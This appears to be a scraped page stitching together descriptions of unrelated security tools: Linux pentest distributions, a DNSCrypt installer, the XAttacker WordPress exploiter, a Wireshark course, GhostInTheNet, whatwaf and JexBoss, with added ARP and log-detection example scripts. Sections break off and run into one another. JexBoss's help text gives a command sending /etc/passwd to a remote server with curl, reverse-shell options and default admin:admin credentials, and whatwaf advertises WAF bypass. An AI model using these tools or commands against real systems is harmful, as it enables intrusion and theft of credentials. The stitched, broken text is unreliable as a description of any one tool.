BackBox is a penetration-testing and security-assessment oriented, Ubuntu-based Linux distribution providing a network and information systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
BlackArch is a penetration testing distribution based on Arch Linux that provides a large number of cyber security tools. It is an open-source distro created specifically for penetration testers and security researchers...
Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
A script for installing and automatically configuring DNSCrypt on Linux-based systems.
Description
DNSCrypt is a protocol for securing communications between a client and a DNS resolver by encrypting DNS queries and responses. It verifies that responses you get from a DNS provider have actually been sent by that provider, and haven't been tampered with.
This script will automatically and securely set up DNSCrypt as a background service that runs at system startup using DNSCrypt-proxy, the libsodium cryptography library, and the DNSCrypt service provider of your choice. The script also has options that allow you to change the service provider at any time, turn off DNSCrypt to use regular unencrypted DNS, as well as uninstall DNSCrypt.
Installation
The script supports recent Red Hat-based (CentOS, Fedora, Scientific Linux) and Debian-based (Debian, Ubuntu, Linux Mint) distributions, and OpenSUSE.
Note
Scripts with sysvinit support were moved to the "legacy" branch (CentOS 6, Debian 7, Ubuntu < 16.04)
wget https://raw.githubusercontent.com/simonclausen/dnscrypt-autoinstall/master/dnscrypt-autoinstall
chmod +x dnscrypt-autoinstall
su -c ./dnscrypt-autoinstall
Supported providers
Providers are retrieved from the latest published dnscrypt-resolvers.csv (github.com/jedisct1), with a fallback to those included with the DNSCrypt installation.
Troubleshooting
If the install fails at a particular stage and the script mentions that DNSCrypt is already configured, use the forcedel argument to force an uninstallation:
Example: if you have a list of websites, run the tool with this command line:
perl XAttacker.pl -l list.txt
If you do not have a list of websites, run the tool with this command:
perl XAttacker.pl
For coloring on Windows, add this line:
use Win32::Console::ANSI;
Version
Current version is 2.1
What's New
• Wordpress Levo-Slideshow 2.3 - Arbitrary File Upload
• GS-Dorker
• speed up
• Bug fixes
version 2.0
• speed up
• Bug fixes
version 1.9
• Bug fixes
Wireshark is the most widely used network capture and protocol analyzer on the market. It is used by IT and network administrators to troubleshoot network connectivity issues and by network security analysts to dissect network attacks. This free and open source application is so widely used in the industry because it works. It is cross-platform, meaning that it runs on Windows, Mac, Linux and FreeBSD. This course is an introduction to the application and goes over the basics to get you started capturing and analyzing network traffic. It will build your base by explaining the theory behind how networks work and then get you into real-world applications of the software. In this course you will learn:
The basics of how networks operate
How to capture traffic in Wireshark
How to use display and capture filters
How to use command line wireshark to work with large packet captures
Who is the target audience?
Network Administrators
System Administrators
IT Security Analysts
Type: Course
Language: English
Number of videos: 24
Year: 2015
Format: MP4
Size: 675 MB
Password: offsec
Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan.
Properties:
Network Invisibility
Network Anonymity
Protects from MITM/DOS
Transparent
Cross-platform
Minimalistic
Dependencies:
Linux 2.4.26+ - will work on any Linux-based OS, including Whonix and RaspberryPI
BASH - the whole script
root privileges - for controlling kernel settings
Limitations:
You can still be found with VLAN logs if using ethernet or by triangulation/broadcast if using WiFi
MAC spoofing won't work if appropriate mitigations have been taken, such as DAI or sticky MAC
Might be buggy with some CISCO switches
Not suitable for production servers
How it works
ARP for IPv4 and NDP (ICMPv6) for IPv6 are the basic, primary protocols at the link and network layer that provide connectivity within a LAN. Despite their utility and simplicity, they have numerous vulnerabilities that can lead to MITM attacks and loss of confidentiality. Patching such a widely used standard is a practically impossible task. A very simple yet effective solution is to disable ARP and NDP responses on an interface and to be very cautious with broadcasting. Across the various implementations, this means that nobody on the network can communicate with such a host unless the host initiates the communication itself. The ARP/NDP cache entries for it are erased shortly afterwards. Here is an example schema:
A >>> I need MAC address of B >>> B
A <<< Here it is <<< B
A <<< I need MAC address of A <<< B
A >>> I'm not giving it >>> B
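The schema above can be played through in code. The following is an added toy model, not part of the GhostInTheNet script: an in-memory LAN in which host A never answers ARP requests, while B learns A's address from A's own request frame and then forgets it once the cache entry ages out. The hosts, addresses and the CACHE_LIFETIME constant are constructed for the example; the real kernel neighbour timeouts and the sysctls the script sets are not modelled.

```python
"""Toy model of the ARP exchange sketched in the schema above.

Constructed example: a tiny in-memory LAN where one host (the "ghost")
never answers ARP requests. Hosts, addresses and the cache lifetime are
made up; the kernel's real neighbour timeouts and the sysctls the
GhostInTheNet script touches are not modelled.
"""
from dataclasses import dataclass, field

# Constructed stand-in for the neighbour-table timeout (seconds).
CACHE_LIFETIME = 60


@dataclass
class Host:
    name: str
    ip: str
    mac: str
    answers_arp: bool = True                   # False for the ghost host
    cache: dict = field(default_factory=dict)  # ip -> (mac, learned_at)


class Lan:
    """Broadcast domain with a simulated clock."""

    def __init__(self, hosts):
        self.hosts = {h.ip: h for h in hosts}
        self.clock = 0

    def tick(self, seconds):
        self.clock += seconds

    def resolve(self, requester, target_ip):
        """Resolve target_ip for requester; return the MAC or None.

        A fresh cache entry is used directly. Otherwise a request is
        broadcast: the target always learns the requester's mapping from
        the request frame (as in RFC 826) but only replies if it answers
        ARP at all. Expired entries are dropped, which is what makes the
        ghost host "forgotten" once it stops talking.
        """
        entry = requester.cache.get(target_ip)
        if entry is not None:
            mac, learned_at = entry
            if self.clock - learned_at < CACHE_LIFETIME:
                return mac
            del requester.cache[target_ip]

        target = self.hosts.get(target_ip)
        if target is None:
            return None
        target.cache[requester.ip] = (requester.mac, self.clock)
        if not target.answers_arp:
            return None                # "I'm not giving it"
        requester.cache[target_ip] = (target.mac, self.clock)
        return target.mac              # "Here it is"


def sweep(lan, scanner):
    """ARP-style sweep (like arping) from scanner; returns the IPs that answered."""
    return sorted(ip for ip in lan.hosts
                  if ip != scanner.ip and lan.resolve(scanner, ip) is not None)


def run_schema():
    """Play the A/B exchange from the schema, then a sweep from a third host."""
    a = Host("A", "10.0.0.1", "aa:aa:aa:aa:aa:aa", answers_arp=False)  # the ghost
    b = Host("B", "10.0.0.2", "bb:bb:bb:bb:bb:bb")
    c = Host("C", "10.0.0.3", "cc:cc:cc:cc:cc:cc")
    lan = Lan([a, b, c])

    results = {}
    results["a_learns_b"] = lan.resolve(a, b.ip)        # A asks for B's MAC, B answers
    results["b_knows_a_now"] = lan.resolve(b, a.ip)     # B learned A from A's request frame
    lan.tick(CACHE_LIFETIME + 1)
    results["b_knows_a_later"] = lan.resolve(b, a.ip)   # entry expired, A stays silent
    results["sweep_from_c"] = sweep(lan, c)             # only B shows up
    return results


if __name__ == "__main__":
    for key, value in run_schema().items():
        print(f"{key}: {value}")
```

The point the model makes explicit is that silence is one-directional: A can still open connections because B learns A's mapping from A's broadcast request, but once A's entry expires B has no way to get it back, and a sweep from a third host never sees A at all.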
To increase privacy, it is advised to spoof the MAC address as well, which provides better concealment. All of this is possible with simple commands to the Linux kernel and a script that automates them.
Analysis
No ARP/NDP means no connectivity from others, hence absolute stealth and obscurity at the network/link layer. This protects from all possible DoS and MITM attacks (ARP, DNS, DHCP, ICMP, port stealing) and is far less resource-consuming than ArpON. Such a mitigation makes it impossible to be scanned (nmap, arping). Moreover, from the host's perspective it does not affect normal Internet or LAN connectivity. If you connect to a host, you are able to do so, but shortly after the communication stops that host forgets about you, because ARP/NDP table entries do not persist long without a fresh request. Given its broad compatibility and cross-platform nature, it is very useful for offsec/pentest/red-teaming as well. You see everyone, but nobody sees you: you are a ghost. Countering it while keeping real supervision over the network would require deep reconfiguration of OSes, IDPSes and all other equipment, which is hardly feasible.
HowTo
You can execute the script after connecting to the network, or just before:
sudo GhostInTheNet.sh on eth0
This will activate the solution until reboot. If you want to stop it:
sudo GhostInTheNet.sh off eth0
Of course, you will have to make the script executable in the first place:
chmod u+x GhostInTheNet.sh
Notes
The ARP/NDP protocols can be exploited for defensive purposes. Now your PoisonTap is literally undetectable and your Tails is even more anonymous. You should learn some things about IPv6.
Ability to run on a single URL with the -u/--url flag
Ability to run through a list of URLs with the -l/--list flag
Ability to detect over 40 different firewalls
Ability to try over 20 different tampering techniques
Ability to pass your own payloads either from a file or from the terminal
Payloads that are guaranteed to produce at least one WAF triggering
Ability to bypass firewalls using both SQLi techniques and cross site scripting techniques
Ability to run behind Tor
Ability to run behind multiple proxy types (socks4, socks5, http, https)
Ability to use a random user agent, personal user agent, or custom default user agent
More to come...
Installation
Installing whatwaf is super easy; all you have to do is the following. Have Python 2.7 (Python 3.x compatibility is being implemented soon):
Features
The tool and exploits were developed and tested for:
JBoss Application Server versions: 3, 4, 5 and 6.
Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)
The exploitation vectors are:
/admin-console
tested and working in JBoss versions 5 and 6
/jmx-console
tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6
/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6
Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
Servlet Deserialization
tested and working against multiple java applications, platforms, etc, via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)
Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications
Others
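The vector paths listed above are also what a defender should look for in web-server access logs. The following is an added, defender-side example and is not part of JexBoss: it parses combined-format log lines, flags any request touching one of the listed paths, and rates a POST to an Invoker endpoint (the way a serialized object would be delivered) higher than a plain GET to a console, since administrators legitimately browse admin-console and jmx-console. The log lines, client addresses and severity labels are constructed for the example.

```python
"""Flag requests to the JBoss exploitation vectors listed above in access logs.

Added defender-side example (not JexBoss code). Log lines are constructed
in Apache/nginx combined-log style using documentation address ranges.
"""
import re
from collections import Counter

# Vector paths as listed on the page. Admins also use admin-console and
# jmx-console, so a GET there is only "medium"; a POST to an Invoker
# endpoint is how a serialized object would be submitted, hence "high".
VECTOR_PATHS = (
    "/admin-console",
    "/jmx-console",
    "/web-console/Invoker",
    "/invoker/JMXInvokerServlet",
)
INVOKER_PATHS = {"/web-console/Invoker", "/invoker/JMXInvokerServlet"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not captured from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2017:13:55:36 +0000] "GET /jmx-console/ HTTP/1.1" 200 1043
203.0.113.7 - - [10/Oct/2017:13:55:40 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 512
198.51.100.4 - - [10/Oct/2017:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2017:13:56:12 +0000] "POST /web-console/Invoker HTTP/1.1" 500 0
192.0.2.9 - - [10/Oct/2017:14:02:55 +0000] "GET /admin-console/login.seam?x=1 HTTP/1.1" 200 3301
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_vector(path):
    """Return the vector path a request path belongs to, or None."""
    path = path.split("?", 1)[0]          # ignore the query string
    for vector in VECTOR_PATHS:
        if path == vector or path.startswith(vector + "/"):
            return vector
    return None


def detect_jboss_vectors(log_text):
    """Scan log text; return one hit dict per request touching a vector path."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        vector = match_vector(rec["path"])
        if vector is None:
            continue
        high = rec["method"] == "POST" and vector in INVOKER_PATHS
        hits.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "method": rec["method"],
            "path": rec["path"],
            "vector": vector,
            "status": rec["status"],
            "severity": "high" if high else "medium",
        })
    return hits


def hits_per_source(hits):
    """Count flagged requests per client IP, for triage."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = detect_jboss_vectors(SAMPLE_LOG)
    for h in found:
        print(f'{h["severity"]:6} {h["ip"]:14} {h["method"]:4} {h["path"]} ({h["vector"]})')
    print(hits_per_source(found))
```

On the sample log this flags four of the five lines and attributes three of them to one source, two of which are POSTs to Invoker endpoints. A status of 500 on such a POST is worth a closer look rather than dismissal: a failed deserialization attempt logs much the same as a successful one. The Struts2 vector (CVE-2017-5638) has no fixed path and is not covered by this check.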
Videos
Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss
Exploiting JBoss Application Server with JexBoss
Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)
Reverse Shell (meterpreter integration)
After you exploit a JBoss server, you can use jexboss's own command shell or perform a reverse connection using the following command:
When exploiting Java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are to make a reverse shell connection or to send a command to execute.
Usage examples
For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:
For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
--auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE
PERMISSION!!!)
--disable-check-updates, -D
Disable two updates checks: 1) Check for updates
performed by the webshell in exploited server at
http://webshell.jexboss.net/jsp_version.txt and 2)
check for updates performed by the jexboss client at
http://joaomatosf.com/rnp/releases.txt
-mode {standalone,auto-scan,file-scan}
Operation mode (DEFAULT: standalone)
--app-unserialize, -j
Check for java unserialization vulnerabilities in HTTP
parameters (eg. javax.faces.ViewState, oldFormData,
etc)
--servlet-unserialize, -l
Check for java unserialization vulnerabilities in
Servlets (like Invoker interfaces)
--jboss Check only for JBOSS vectors.
--jenkins Check only for Jenkins CLI vector.
--jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat
(CVE-2016-3427 and CVE-2016-8735). OBS: Will not be
checked by default.
--proxy PROXY, -P PROXY
Use a http proxy to connect to the target URL (eg. -P
http://192.168.0.1:3128)
--proxy-cred LOGIN:PASS, -L LOGIN:PASS
Proxy authentication credentials (eg -L name:password)
--jboss-login LOGIN:PASS, -J LOGIN:PASS
JBoss login and password for exploit admin-console in
JBoss 5 and JBoss 6 (default: admin:admin)
--timeout TIMEOUT Seconds to wait before timeout connection (default 3)
Standalone mode:
-host HOST, -u HOST Host address to be checked (eg. -u
http://192.168.0.10:8080)
Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
--reverse-host RHOST:RPORT, -r RHOST:RPORT
Remote host address and port for reverse shell when
exploiting Java Deserialization Vulnerabilities in
application layer (for now, working only against *nix
systems)(eg. 192.168.0.10:1331)
--cmd CMD, -x CMD Send specific command to run on target (eg. curl -d
@/etc/passwd http://your_server)
--windows, -w Specifies that the commands are for WINDOWS Systems
(cmd.exe)
--post-parameter PARAMETER, -H PARAMETER
Specify the parameter to find and inject serialized
objects into it. (egs. -H javax.faces.ViewState or -H
oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
javax.faces.ViewState)
--show-payload, -t Print the generated payload.
--gadget {commons-collections3.1,commons-collections4.0,groovy1}
Specify the type of Gadget to generate the payload
automatically. (DEFAULT: commons-collections3.1 or
groovy1 for JenKins)
--load-gadget FILENAME
Provide your own gadget from file (a java serialized
object in RAW mode)
--force, -F Force send java serialized gadgets to URL informed in
-u parameter. This will send the payload in multiple
formats (eg. RAW, GZIPED and BASE64) and with
different Content-Types.
Auto scan mode:
-network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)
-ports PORTS List of ports separated by commas to be checked for
each host (eg. 8080,8443,8888,80,443)
-results FILENAME File name to store the auto scan results
File scan mode:
-file FILENAME_HOSTS Filename with host list to be scanned (one host per
line)
-out FILENAME_RESULTS
File name to store the file scan results